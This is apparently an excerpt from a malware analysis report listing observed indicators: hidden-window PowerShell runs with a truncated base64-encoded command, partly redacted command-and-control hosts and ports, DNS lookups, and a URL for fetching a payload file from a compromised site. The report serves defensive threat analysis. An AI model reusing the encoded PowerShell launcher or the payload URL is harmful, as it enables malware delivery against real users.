Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABMAGQAdwBWAHUARwB3AD0AJwBJAHIAQwA3AFYAagBtAGMAJwA7ACQAaABGAGIANAB6AEYAaQBjACAAPQAgACcANAA1ADEAJwA7ACQAaABmAEEAXwBGADgAPQAnAE4AUQB6AHQAWgB1AHQAJwA7ACQAagBkAG4ATABSAG8AbQBkAD0AJABlAG4Ad...
- 'bi###ngel.com':80
- '85.##4.32.153':8080
- http://bi###ngel.com/bienangel/templates/beez3/html/com_contact/categories/waterMark.bin
- DNS ASK va###cafe.com
- DNS ASK bi###ngel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABMAGQAdwBWAHUARwB3AD0AJwBJAHIAQwA3AFYAagBtAGMAJwA7ACQAaABGAGIANAB6AEYAaQBjACAAPQAgACcANAA1ADEAJwA7ACQAaABmAEEAXwBGADgAPQAnAE4AUQB6AHQAWgB1AHQAJwA7ACQAagBkAG4ATABSAG8AbQBkAD0AJABlAG4Ad...' (with hidden window)